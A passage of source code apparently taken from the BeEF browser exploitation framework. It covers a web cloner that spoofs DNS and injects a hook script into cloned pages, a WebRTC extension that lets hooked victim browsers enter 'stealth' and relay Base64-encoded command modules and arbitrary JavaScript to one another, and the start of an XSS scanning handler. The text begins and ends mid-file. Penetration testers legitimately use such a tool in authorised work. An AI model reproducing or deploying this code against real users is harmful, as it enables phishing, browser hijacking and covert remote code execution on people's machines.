|ai| ai.ipv6? && !ai.ipv6_loopback? }.ip_address ipv6.gsub!(/%\w*$/, '') domain = url.gsub(%r{^http://}, '') unless ipv4.nil? dns.add_rule( pattern: domain, resource: Resolv::DNS::Resource::IN::A, response: ipv4 ) end unless ipv6.nil? dns.add_rule( pattern: domain, resource: Resolv::DNS::Resource::IN::AAAA, response: ipv6 ) end print_info "DNS records spoofed [A: #{ipv4} AAAA: #{ipv6}]" end print_info "Mounting cloned page on URL [#{mount}]" @http_server.mount(mount.to_s, interceptor.new) @http_server.remap true end private # Replace </head> with <BeEF_hook></head> def add_beef_hook(line) # @todo why is this an inline replace? and why is the second branch empty? if line.include?('</head>') line.gsub!('</head>', "<script type=\"text/javascript\" src=\"#{@beef_hook}\"></script>\n</head>") elsif line.gsub!('</HEAD>', "<script type=\"text/javascript\" src=\"#{@beef_hook}\"></script>\n</HEAD>") end line end # Check if the URL X-Frame-Options header allows the page to be framed. # @todo check for framebusting JS code # @todo check CSP def url_is_frameable?(url) uri = URI(url) http = Net::HTTP.new(uri.host, uri.port) if uri.scheme == 'https' http.use_ssl = true http.verify_mode = OpenSSL::SSL::VERIFY_NONE unless @config.get('beef.extension.social_engineering.web_cloner.verify_ssl') end request = Net::HTTP::Get.new(uri.request_uri) response = http.request(request) frame_opt = response['X-Frame-Options'] # @todo why is this using casecmp? if !frame_opt.nil? && (frame_opt.casecmp('DENY') == 0 || frame_opt.casecmp('SAMEORIGIN') == 0) print_info "URL can be framed: #{url}" return true end print_info "URL cannot be framed: #{url}" false rescue StandardError => e print_error "Unable to determine if URL can be framed: #{url}" print_debug e # print_debug e.backtrace false end def get_page_content(file_path) file = File.open(file_path, 'r') cloned_page = file.read file.close cloned_page end def persist_page(uri, mount) webcloner_db = BeEF::Core::Models::WebCloner.new( uri: uri, mount: mount ) webcloner_db.save webcloner_db end end end end end
Text
beef/extensions/social_engineering/web_cloner/cloned_pages/readme.txt
This is the directory where the cloned pages will be placed. If you clone beefproject.com, there will be 2 files: - beefproject.com <- original, unmodified - beefproject.com_mod <- modified one In case you want to further modify the beefproject.com_mod manually, and serve it through BeEF, do the following: - clone the page - modify the beefproject.com_mod file - clone the same page again, adding the "use_existing":"true" parameter in the RESTful API call. In this way the x_mod page will be served, with your custom modifications.
Ruby
beef/extensions/webrtc/api.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module WebRTC module RegisterHttpHandler BeEF::API::Registrar.instance.register(BeEF::Extension::WebRTC::RegisterHttpHandler, BeEF::API::Server, 'mount_handler') # We register the http handler for the WebRTC signalling extension. # This http handler will handle WebRTC signals from browser to browser # We also define an rtc message handler, so that the beefwebrtc object can send messages back into BeEF def self.mount_handler(beef_server) beef_server.mount('/rtcsignal', BeEF::Extension::WebRTC::SignalHandler) beef_server.mount('/rtcmessage', BeEF::Extension::WebRTC::MessengeHandler) beef_server.mount('/api/webrtc', BeEF::Extension::WebRTC::WebRTCRest.new) end end module RegisterPreHookCallback BeEF::API::Registrar.instance.register(BeEF::Extension::WebRTC::RegisterPreHookCallback, BeEF::API::Server::Hook, 'pre_hook_send') # We register this pre hook action to ensure that signals going to a browser are included back in the hook.js polling # This is also used so that BeEF can send RTCManagement messages to the hooked browser too def self.pre_hook_send(hooked_browser, body, params, request, response) dhook = BeEF::Extension::WebRTC::API::Hook.new dhook.requester_run(hooked_browser, body) end end end end end
YAML
beef/extensions/webrtc/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: extension: webrtc: name: 'WebRTC' enable: false authors: ["xntrik"] stunservers: '["stun:stun.l.google.com:19302","stun:stun1.l.google.com:19302","turn:numb.viagenie.ca:3478"]' # stunservers: '["stun:stun.l.google.com:19302"]' turnservers: '{"username": "someone%40somewhere.com", "password": "somepass", "uris": ["turn:numb.viagenie.ca:3478?transport=udp","turn:numb.viagenie.ca:3478?transport=tcp"]}'
Ruby
beef/extensions/webrtc/extension.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module WebRTC extend BeEF::API::Extension @short_name = 'webrtc' @full_name = 'WebRTC' @description = 'WebRTC extension to all browsers to connect to each other (P2P) with WebRTC' end end end require 'extensions/webrtc/models/rtcsignal' require 'extensions/webrtc/models/rtcmanage' require 'extensions/webrtc/models/rtcstatus' require 'extensions/webrtc/models/rtcmodulestatus' require 'extensions/webrtc/api/hook' require 'extensions/webrtc/handlers' require 'extensions/webrtc/api' require 'extensions/webrtc/rest/webrtc'
Ruby
beef/extensions/webrtc/handlers.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module WebRTC # # The http handler that manages the WebRTC signals sent from browsers to other browsers. # class SignalHandler R = BeEF::Core::Models::RtcSignal Z = BeEF::Core::Models::HookedBrowser def initialize(data) @data = data setup() end def setup() # validates the hook token beef_hook = @data['beefhook'] || nil (print_error "beefhook is null";return) if beef_hook.nil? # validates the target hook token target_beef_id = @data['results']['targetbeefid'] || nil (print_error "targetbeefid is null";return) if target_beef_id.nil? # validates the signal signal = @data['results']['signal'] || nil (print_error "Signal is null";return) if signal.nil? # validates that a hooked browser with the beef_hook token exists in the db zombie_db = Z.first(:session => beef_hook) || nil (print_error "Invalid beefhook id: the hooked browser cannot be found in the database";return) if zombie_db.nil? # validates that a target browser with the target_beef_token exists in the db target_zombie_db = Z.first(:id => target_beef_id) || nil (print_error "Invalid targetbeefid: the target hooked browser cannot be found in the database";return) if target_zombie_db.nil? # save the results in the database signal = R.new( :hooked_browser_id => zombie_db.id, :target_hooked_browser_id => target_zombie_db.id, :signal => signal ) signal.save end end # # The http handler that manages the WebRTC messages sent from browsers. # class MessengeHandler Z = BeEF::Core::Models::HookedBrowser def initialize(data) @data = data setup() end def setup() # validates the hook token beef_hook = @data['beefhook'] || nil (print_error "beefhook is null";return) if beef_hook.nil? # validates the target hook token peer_id = @data['results']['peerid'] || nil (print_error "peerid is null";return) if peer_id.nil? # validates the message message = @data['results']['message'] || nil (print_error "Message is null";return) if message.nil? # validates that a hooked browser with the beef_hook token exists in the db zombie_db = Z.first(:session => beef_hook) || nil (print_error "Invalid beefhook id: the hooked browser cannot be found in the database";return) if zombie_db.nil? # validates that a browser with the peerid exists in the db peer_zombie_db = Z.first(:id => peer_id) || nil (print_error "Invalid peer_id: the peer hooked browser cannot be found in the database";return) if peer_zombie_db.nil? # Writes the event into the BeEF Logger BeEF::Core::Logger.instance.register('WebRTC', "Browser:#{zombie_db.id} received message from Browser:#{peer_zombie_db.id}: #{message}") # Perform logic depending on message (updating database) puts "message = '" + message + "'" if (message == "ICE Status: connected") # Find existing status message stat = BeEF::Core::Models::Rtcstatus.first(:hooked_browser_id => zombie_db.id, :target_hooked_browser_id => peer_zombie_db.id) || nil unless stat.nil? stat.status = "Connected" stat.updated_at = Time.now stat.save end stat2 = BeEF::Core::Models::Rtcstatus.first(:hooked_browser_id => peer_zombie_db.id, :target_hooked_browser_id => zombie_db.id) || nil unless stat2.nil? stat2.status = "Connected" stat2.updated_at = Time.now stat2.save end elsif (message.end_with?("disconnected")) stat = BeEF::Core::Models::Rtcstatus.first(:hooked_browser_id => zombie_db.id, :target_hooked_browser_id => peer_zombie_db.id) || nil unless stat.nil? stat.status = "Disconnected" stat.updated_at = Time.now stat.save end stat2 = BeEF::Core::Models::Rtcstatus.first(:hooked_browser_id => peer_zombie_db.id, :target_hooked_browser_id => zombie_db.id) || nil unless stat2.nil? stat2.status = "Disconnected" stat2.updated_at = Time.now stat2.save end elsif (message == "Stayin alive") stat = BeEF::Core::Models::Rtcstatus.first(:hooked_browser_id => zombie_db.id, :target_hooked_browser_id => peer_zombie_db.id) || nil unless stat.nil? stat.status = "Stealthed!!" stat.updated_at = Time.now stat.save end stat2 = BeEF::Core::Models::Rtcstatus.first(:hooked_browser_id => peer_zombie_db.id, :target_hooked_browser_id => zombie_db.id) || nil unless stat2.nil? stat2.status = "Peer-controlled stealth-mode" stat2.updated_at = Time.now stat2.save end elsif (message == "Coming out of stealth...") stat = BeEF::Core::Models::Rtcstatus.first(:hooked_browser_id => zombie_db.id, :target_hooked_browser_id => peer_zombie_db.id) || nil unless stat.nil? stat.status = "Connected" stat.updated_at = Time.now stat.save end stat2 = BeEF::Core::Models::Rtcstatus.first(:hooked_browser_id => peer_zombie_db.id, :target_hooked_browser_id => zombie_db.id) || nil unless stat2.nil? stat2.status = "Connected" stat2.updated_at = Time.now stat2.save end elsif (message.start_with?("execcmd")) mod = /\(\/command\/(.*)\.js\)/.match(message)[1] resp = /Result:.(.*)/.match(message)[1] stat = BeEF::Core::Models::Rtcmodulestatus.new(:hooked_browser_id => zombie_db.id, :target_hooked_browser_id => peer_zombie_db.id, :command_module_id => mod, :status => resp, :created_at => Time.now, :updated_at => Time.now) stat.save end end end end end end
Ruby
beef/extensions/webrtc/api/hook.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # # A lot of this logic is cloned from the requester extension, which had a sane way of sending/recvng # JS to the clients.. module BeEF module Extension module WebRTC module API require 'uri' class Hook include BeEF::Core::Handlers::Modules::BeEFJS # If the RtcSignal table contains requests that need to be sent (has_sent = waiting), retrieve # and send them to the hooked browser. # Don't forget, these are signalling messages for a peer, so we don't check that the request # is for the hooked_browser_id, but the target # This logic also checks the Rtc def requester_run(hb, body) @body = body rtcsignaloutput = [] rtcmanagementoutput = [] # Get all RTCSignals for this browser BeEF::Core::Models::RtcSignal.where(:target_hooked_browser_id => hb.id, :has_sent => "waiting").each { |h| # output << self.requester_parse_db_request(h) rtcsignaloutput << h.signal h.has_sent = "sent" h.save } # Get all RTCManagement messages for this browser BeEF::Core::Models::RtcManage.where(:hooked_browser_id => hb.id, :has_sent => "waiting").each {|h| rtcmanagementoutput << h.message h.has_sent = "sent" h.save } # Return if we have no new data to add to hook.js return if rtcsignaloutput.empty? and rtcmanagementoutput.empty? config = BeEF::Core::Configuration.instance ws = BeEF::Core::Websocket::Websocket.instance # todo antisnatchor: prevent sending "content" multiple times. Better leaving it after the first run, and don't send it again. #todo antisnatchor: remove this gsub crap adding some hook packing. # The below is how antisnatchor was managing insertion of messages dependent on WebSockets or not # Hopefully this still works if config.get("beef.http.websocket.enable") && ws.getsocket(hb.session) rtcsignaloutput.each {|o| add_rtcsignal_to_body o } unless rtcsignaloutput.empty? rtcmanagementoutput.each {|o| add_rtcmanagement_to_body o } unless rtcmanagementoutput.empty? # ws.send(content + @body,hb.session) ws.send(@body,hb.session) #if we use WebSockets, just reply wih the component contents else # if we use XHR-polling, add the component to the main hook file rtcsignaloutput.each {|o| add_rtcsignal_to_body o } unless rtcsignaloutput.empty? rtcmanagementoutput.each {|o| add_rtcmanagement_to_body o } unless rtcmanagementoutput.empty? end end def add_rtcsignal_to_body(output) @body << %Q{ beef.execute(function() { var peerid = null; for (k in beefrtcs) { if (beefrtcs[k].allgood === false) { peerid = beefrtcs[k].peerid; } } if (peerid == null) { beef.debug('received a peer message, but, we are already setup?'); } else { beefrtcs[peerid].processMessage( JSON.stringify(#{output}) ); } }); } end def add_rtcmanagement_to_body(output) @body << %Q{ beef.execute(function() { #{output} }); } end end end end end end
Ruby
beef/extensions/webrtc/models/rtcmanage.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Core module Models # # Table stores the queued up JS commands for managing the client-side webrtc logic. # class RtcManage < BeEF::Core::Model # Starts the RTCPeerConnection process, establishing a WebRTC connection between the caller and the receiver def self.initiate(caller, receiver, verbosity = false) stunservers = BeEF::Core::Configuration.instance.get("beef.extension.webrtc.stunservers") turnservers = BeEF::Core::Configuration.instance.get("beef.extension.webrtc.turnservers") # Add the beef.webrtc.start() JavaScript call into the RtcManage table - this will be picked up by the browser on next hook.js poll # This is for the Receiver r = BeEF::Core::Models::RtcManage.new(:hooked_browser_id => receiver, :message => "beef.webrtc.start(0,#{caller},JSON.stringify(#{turnservers}),JSON.stringify(#{stunservers}),#{verbosity});") r.save! # This is the same beef.webrtc.start() JS call, but for the Caller r = BeEF::Core::Models::RtcManage.new(:hooked_browser_id => caller, :message => "beef.webrtc.start(1,#{receiver},JSON.stringify(#{turnservers}),JSON.stringify(#{stunservers}),#{verbosity});") r.save! end # Advises a browser to send an RTCDataChannel message to its peer # Similar to the initiate method, this loads up a JavaScript call to the beefrtcs[peerid].sendPeerMsg() function call def self.sendmsg(from, to, message) r = BeEF::Core::Models::RtcManage.new(:hooked_browser_id => from, :message => "beefrtcs[#{to}].sendPeerMsg('#{message}');") r.save! end # Gets the browser to run the beef.webrtc.status() JavaScript function # This JS function will return it's values to the /rtcmessage handler def self.status(id) r = BeEF::Core::Models::RtcManage.new(:hooked_browser_id => id, :message => "beef.webrtc.status(#{id});") r.save! end end end end end
Ruby
beef/extensions/webrtc/models/rtcmodulestatus.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Core module Models # # Table stores the webrtc status information # This includes things like connection status, and executed modules etc # class Rtcmodulestatus < BeEF::Core::Model belongs_to :hooked_browser belongs_to :command_module end end end end
Ruby
beef/extensions/webrtc/models/rtcsignal.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Core module Models # # Table stores the webrtc signals from a hooked_browser, directed to a target_hooked_browser # class RtcSignal < BeEF::Core::Model belongs_to :hooked_browser end end end end
Ruby
beef/extensions/webrtc/models/rtcstatus.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Core module Models # # Table stores the webrtc status information # This includes things like connection status, and executed modules etc # class Rtcstatus < BeEF::Core::Model belongs_to :hooked_browser end end end end
Ruby
beef/extensions/webrtc/rest/webrtc.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module WebRTC require 'base64' # This class handles the routing of RESTful API requests that manage the # WebRTC Extension class WebRTCRest < BeEF::Core::Router::Router # Filters out bad requests before performing any routing before do config = BeEF::Core::Configuration.instance # Require a valid API token from a valid IP address halt 401 unless params[:token] == config.get('beef.api_token') halt 403 unless BeEF::Core::Rest.permitted_source?(request.ip) headers 'Content-Type' => 'application/json; charset=UTF-8', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Expires' => '0' end # # @note Initiate two browsers to establish a WebRTC PeerConnection # Return success = true if the message has been queued - as this is # asynchronous, you will have to monitor BeEFs event log for success # messages. For instance: Event: Browser:1 received message from # Browser:2: ICE Status: connected # # Alternatively, the new rtcstatus model also records events during # RTC connectivity # # Input must be specified in JSON format (the verbose option is no # longer required as client-debugging uses the beef.debug) # # +++ Example: +++ # POST /api/webrtc/go?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1 # Host: 127.0.0.1:3000 # Content-Type: application/json; charset=UTF-8 # # {"from":1, "to":2} #===response (snip)=== # HTTP/1.1 200 OK # Content-Type: application/json; charset=UTF-8 # # {"success":"true"} # # +++ Example with verbosity on the client-side +++ # POST /api/webrtc/go?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1 # Host: 127.0.0.1:3000 # Content-Type: application/json; charset=UTF-8 # # {"from":1, "to":2, "verbose": true} #===response (snip)=== # HTTP/1.1 200 OK # Content-Type: application/json; charset=UTF-8 # # {"success":"true"} # # +++ Example with curl +++ # curl -H "Content-type: application/json; charset=UTF-8" -v # -X POST -d '{"from":1,"to":2,"verbose":true}' # http://127.0.0.1:3000/api/webrtc/go\?token\=df67654b03d030d97018f85f0284247d7f49c348 post '/go' do body = JSON.parse(request.body.read) fromhb = body['from'] raise InvalidParamError, 'from' if fromhb.nil? tohb = body['to'] raise InvalidParamError, 'to' if tohb.nil? verbose = body['verbose'] result = {} if [fromhb, tohb].include?(nil) result['success'] = false return result.to_json end if verbose.to_s =~ (/^(true|t|yes|y|1)$/i) BeEF::Core::Models::RtcManage.initiate(fromhb.to_i, tohb.to_i, true) else BeEF::Core::Models::RtcManage.initiate(fromhb.to_i, tohb.to_i) end r = BeEF::Core::Models::Rtcstatus.new( hooked_browser_id: fromhb.to_i, target_hooked_browser_id: tohb.to_i, status: 'Initiating..', created_at: Time.now, updated_at: Time.now ) r.save r2 = BeEF::Core::Models::Rtcstatus.new( hooked_browser_id: tohb.to_i, target_hooked_browser_id: fromhb.to_i, status: 'Initiating..', created_at: Time.now, updated_at: Time.now ) r2.save result['success'] = true result.to_json rescue InvalidParamError => e print_error e.message halt 400 rescue StandardError => e print_error "Internal error while initiating RTCPeerConnections .. (#{e.message})" halt 500 end # # @note Get the RTCstatus of a particular browser (and its peers) # Return success = true if the message has been queued - as this is asynchronous, you will have to monitor BeEFs event log # for success messages. For instance: Event: Browser:1 received message from Browser:2: Status checking - allgood: true # # +++ Example: +++ # GET /api/webrtc/status/1?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1 # Host: 127.0.0.1:3000 # #===response (snip)=== # HTTP/1.1 200 OK # Content-Type: application/json; charset=UTF-8 # # {"success":"true"} # # +++ Example with curl +++ # curl -H "Content-type: application/json; charset=UTF-8" -v # -X GET http://127.0.0.1:3000/api/webrtc/status/1\?token\=df67654b03d030d97018f85f0284247d7f49c348 get '/status/:id' do id = params[:id] BeEF::Core::Models::RtcManage.status(id.to_i) result = {} result['success'] = true result.to_json rescue InvalidParamError => e print_error e.message halt 400 rescue StandardError => e print_error "Internal error while queuing status message for #{id} (#{e.message})" halt 500 end # # @note Get the events from the RTCstatus model of a particular browser # Return JSON with events_count and an array of events # # +++ Example: +++ # GET /api/webrtc/events/1?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1 # Host: 127.0.0.1:3000 # #===response (snip)=== # HTTP/1.1 200 OK # Content-Type: application/json; charset=UTF-8 # # {"events_count":1,"events":[{"id":2,"hb_id":1,"target_id":2,"status":"Connected","created_at":"timestamp","updated_at":"timestamp"}]} # # +++ Example with curl +++ # curl -H "Content-type: application/json; charset=UTF-8" -v # -X GET http://127.0.0.1:3000/api/webrtc/events/1\?token\=df67654b03d030d97018f85f0284247d7f49c348 get '/events/:id' do id = params[:id] events = BeEF::Core::Models::Rtcstatus.where(hooked_browser_id: id) events_json = [] count = events.length events.each do |event| events_json << { 'id' => event.id.to_i, 'hb_id' => event.hooked_browser_id.to_i, 'target_id' => event.target_hooked_browser_id.to_i, 'status' => event.status.to_s, 'created_at' => event.created_at.to_s, 'updated_at' => event.updated_at.to_s } end unless events_json.empty? { 'events_count' => count, 'events' => events_json }.to_json end rescue InvalidParamError => e print_error e.message halt 400 rescue StandardError => e print_error "Internal error while queuing status message for #{id} (#{e.message})" halt 500 end # # @note Get the events from the RTCModuleStatus model of a particular browser # Return JSON with events_count and an array of events associated with command module execute # # +++ Example: +++ # GET /api/webrtc/cmdevents/1?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1 # Host: 127.0.0.1:3000 # #===response (snip)=== # HTTP/1.1 200 OK # Content-Type: application/json; charset=UTF-8 # # {"events_count":1,"events":[{"id":2,"hb_id":1,"target_id":2,"status":"prompt=blah","mod":200,"created_at":"timestamp","updated_at":"timestamp"}]} # # +++ Example with curl +++ # curl -H "Content-type: application/json; charset=UTF-8" -v # -X GET http://127.0.0.1:3000/api/webrtc/cmdevents/1\?token\=df67654b03d030d97018f85f0284247d7f49c348 get '/cmdevents/:id' do id = params[:id] events = BeEF::Core::Models::Rtcmodulestatus.where(hooked_browser_id: id) events_json = [] count = events.length events.each do |event| events_json << { 'id' => event.id.to_i, 'hb_id' => event.hooked_browser_id.to_i, 'target_id' => event.target_hooked_browser_id.to_i, 'status' => event.status.to_s, 'created_at' => event.created_at.to_s, 'updated_at' => event.updated_at.to_s, 'mod' => event.command_module_id } end unless events_json.empty? { 'events_count' => count, 'events' => events_json }.to_json end rescue InvalidParamError => e print_error e.message halt 400 rescue StandardError => e print_error "Internal error while queuing status message for #{id} (#{e.message})" halt 500 end # # @note Instruct a browser to send an RTC DataChannel message to one of its peers # Return success = true if the message has been queued - as this is asynchronous, you will have to monitor BeEFs event log # for success messages, IF ANY. # # Input must be specified in JSON format # # +++ Example: +++ # POST /api/webrtc/msg?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1 # Host: 127.0.0.1:3000 # Content-Type: application/json; charset=UTF-8 # # {"from":1, "to":2, "message":"Just a plain message"} #===response (snip)=== # HTTP/1.1 200 OK # Content-Type: application/json; charset=UTF-8 # # {"success":"true"} # # +++ Example with curl +++ # curl -H "Content-type: application/json; charset=UTF-8" -v # -X POST -d '{"from":1,"to":2,"message":"Just a plain message"}' # http://127.0.0.1:3000/api/webrtc/msg\?token\=df67654b03d030d97018f85f0284247d7f49c348 # # Available client-side "message" options and handling: # !gostealth - will put the <to> browser into a stealth mode # !endstealth - will put the <to> browser into normal mode, and it will start talking to BeEF again # %<javascript> - will execute JavaScript on <to> sending the results back to <from> - who will relay back to BeEF # <text> - will simply send a datachannel message from <from> to <to>. # If the <to> is stealthed, it'll bounce the message back. # If the <to> is NOT stealthed, it'll send the message back to BeEF via the /rtcmessage handler post '/msg' do body = JSON.parse(request.body.read) fromhb = body['from'] raise InvalidParamError, 'from' if fromhb.nil? tohb = body['to'] raise InvalidParamError, 'to' if tohb.nil? message = body['message'] raise InvalidParamError, 'message' if message.nil? if message === '!gostealth' stat = BeEF::Core::Models::Rtcstatus.where(hooked_browser_id: fromhb.to_i, target_hooked_browser_id: tohb.to_i).first || nil unless stat.nil? stat.status = 'Selected browser has commanded peer to enter stealth' stat.updated_at = Time.now stat.save end stat2 = BeEF::Core::Models::Rtcstatus.where(hooked_browser_id: tohb.to_i, target_hooked_browser_id: fromhb.to_i).first || nil unless stat2.nil? stat2.status = 'Peer has commanded selected browser to enter stealth' stat2.updated_at = Time.now stat2.save end end result = {} if [fromhb, tohb, message].include?(nil) result['success'] = false else BeEF::Core::Models::RtcManage.sendmsg(fromhb.to_i, tohb.to_i, message) result['success'] = true end result.to_json rescue InvalidParamError => e print_error e.message halt 400 rescue StandardError => e print_error "Internal error while queuing message (#{e.message})" halt 500 end # # @note Instruct a browser to send an RTC DataChannel message to one of its peers # In this instance, the message is a Base64d encoded JS command # which has the beef.net.send statements re-written # Return success = true if the message has been queued - as this is asynchronous, you will have to monitor BeEFs event log # for success messages, IF ANY. # Commands are written back to the rtcmodulestatus model # # Input must be specified in JSON format # # +++ Example: +++ # POST /api/webrtc/cmdexec?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1 # Host: 127.0.0.1:3000 # Content-Type: application/json; charset=UTF-8 # # {"from":1, "to":2, "cmdid":120, "options":[{"name":"option_name","value":"option_value"}]} #===response (snip)=== # HTTP/1.1 200 OK # Content-Type: application/json; charset=UTF-8 # # {"success":"true"} # # +++ Example with curl +++ # curl -H "Content-type: application/json; charset=UTF-8" -v # -X POST -d '{"from":1, "to":2, "cmdid":120, "options":[{"name":"option_name","value":"option_value"}]}' # http://127.0.0.1:3000/api/webrtc/cmdexec\?token\=df67654b03d030d97018f85f0284247d7f49c348 # post '/cmdexec' do body = JSON.parse(request.body.read) fromhb = body['from'] raise InvalidParamError, 'from' if fromhb.nil? tohb = body['to'] raise InvalidParamError, 'to' if tohb.nil? cmdid = body['cmdid'] raise InvalidParamError, 'cmdid' if cmdid.nil? cmdoptions = body['options'] if body['options'] cmdoptions = nil if cmdoptions.eql?('') if [fromhb, tohb, cmdid].include?(nil) result = {} result['success'] = false return result.to_json end # Find the module, modify it, send it to be executed on the tohb # Validate the command module by ID command_module = BeEF::Core::Models::CommandModule.find(cmdid) error 404 if command_module.nil? error 404 if command_module.path.nil? # Get the key of the module based on the ID key = BeEF::Module.get_key_by_database_id(cmdid) error 404 if key.nil? # Try to load the module BeEF::Module.hard_load(key) # Now the module is hard loaded, find it's object and get it command_module = BeEF::Core::Command.const_get( BeEF::Core::Configuration.instance.get( "beef.module.#{key}.class" ) ).new(key) # Check for command options cmddata = cmdoptions.nil? ? [] : cmdoptions # Get path of source JS f = "#{command_module.path}command.js" error 404 unless File.exist? f # Read file @eruby = Erubis::FastEruby.new(File.read(f)) # Parse in the supplied parameters cc = BeEF::Core::CommandContext.new cc['command_url'] = command_module.default_command_url cc['command_id'] = command_module.command_id cmddata.each do |v| cc[v['name']] = v['value'] end # Evalute supplied options @output = @eruby.evaluate(cc) # Gsub the output, replacing all beef.net.send commands # This needs to occur because we want this JS to send messages # back to the peer browser @output = @output.gsub(/beef\.net\.send\((.*)\);?/) do |_s| tmpout = "// beef.net.send removed\n" tmpout += "beefrtcs[#{fromhb}].sendPeerMsg('execcmd (" cmdurl = Regexp.last_match(1).split(',') tmpout += cmdurl[0].gsub(/\s|"|'/, '') tmpout += ") Result: ' + " tmpout += cmdurl[2] tmpout += ');' tmpout end # Prepend the B64 version of the string with @ # The client JS receives the rtc message, detects the @ # and knows to decode it before execution msg = "@#{Base64.strict_encode64(@output)}" # Finally queue the message in the RTC queue for submission # from the from browser to the to browser BeEF::Core::Models::RtcManage.sendmsg(fromhb.to_i, tohb.to_i, msg) result = {} result['success'] = true result.to_json rescue JSON::ParserError => e print_error "Invalid JSON: #{e.message}" halt 400 rescue InvalidParamError => e print_error e.message halt 400 rescue StandardError => e print_error "Internal error while executing command (#{e.message})" halt 500 end # Raised when invalid JSON input is passed to an /api/webrtc handler. class InvalidJsonError < StandardError DEFAULT_MESSAGE = 'Invalid JSON input passed to /api/webrtc handler'.to_json def initialize(message = nil) super(message || DEFAULT_MESSAGE) end end # Raised when an invalid named parameter is passed to an /api/webrtc handler. class InvalidParamError < StandardError DEFAULT_MESSAGE = 'Invalid parameter passed to /api/webrtc handler'.to_json def initialize(message = nil) str = 'Invalid "%s" parameter passed to /api/webrtc handler' message = format str, message unless message.nil? super(message) end end end end end end
Ruby
beef/extensions/xssrays/api.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module Xssrays module RegisterHttpHandler BeEF::API::Registrar.instance.register(BeEF::Extension::Xssrays::RegisterHttpHandler, BeEF::API::Server, 'mount_handler') # # Mounts the handlers and REST interface for processing XSS rays # # @param beef_server [BeEF::Core::Server] HTTP server instance # def self.mount_handler(beef_server) # We register the http handler for the requester. # This http handler will retrieve the http responses for all requests beef_server.mount('/xssrays', BeEF::Extension::Xssrays::Handler.new) # REST API endpoint beef_server.mount('/api/xssrays', BeEF::Extension::Xssrays::XssraysRest.new) end end module RegisterPreHookCallback BeEF::API::Registrar.instance.register(BeEF::Extension::Xssrays::RegisterPreHookCallback, BeEF::API::Server::Hook, 'pre_hook_send') # checks at every polling if there are new scans to be started def self.pre_hook_send(hooked_browser, body, _params, _request, _response) return if hooked_browser.nil? xssrays = BeEF::Extension::Xssrays::API::Scan.new xssrays.start_scan(hooked_browser, body) end end end end end
YAML
beef/extensions/xssrays/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: extension: xssrays: enable: false name: 'XSSRays' authors: ["antisnatchor"] clean_timeout: 3000 cross_domain: true
Ruby
beef/extensions/xssrays/extension.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module Xssrays end end end require 'extensions/xssrays/models/xssraysscan' require 'extensions/xssrays/models/xssraysdetail' require 'extensions/xssrays/api/scan' require 'extensions/xssrays/handler' require 'extensions/xssrays/api' require 'extensions/xssrays/rest/xssrays'
Ruby
beef/extensions/xssrays/handler.rb
# # Copyright (c) 2006-2023 Wade Alcorn - [email protected] # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # module BeEF module Extension module Xssrays class Handler < BeEF::Core::Router::Router XS = BeEF::Core::Models::Xssraysscan XD = BeEF::Core::Models::Xssraysdetail HB = BeEF::Core::Models::HookedBrowser get '/' do # verify if the request contains the hook token # raise an error if it's null or not found in the DB beef_hook = params[:hbsess] || nil if beef_hook.nil? || HB.where(session: beef_hook).first.nil? print_error '[XSSRAYS] Invalid beef hook ID: the hooked browser cannot be found in the database' return end # verify the specified ray ID is valid rays_scan_id = params[:raysid] || nil if rays_scan_id.nil? || !BeEF::Filters.nums_only?(rays_scan_id) print_error '[XSSRAYS] Invalid ray ID' return end case params[:action] when 'ray' # we received a ray parse_rays(rays_scan_id) when 'finish' # we received a notification for finishing the scan finalize_scan(rays_scan_id) else # invalid action print_error '[XSSRAYS] Invalid action' return end headers 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Expires' => '0', 'Access-Control-Allow-Origin' => '*', 'Access-Control-Allow-Methods' => 'POST,GET' end # parse incoming rays: rays are verified XSS, as the attack vector is calling back BeEF when executed. def parse_rays(rays_scan_id) xssrays_scan = 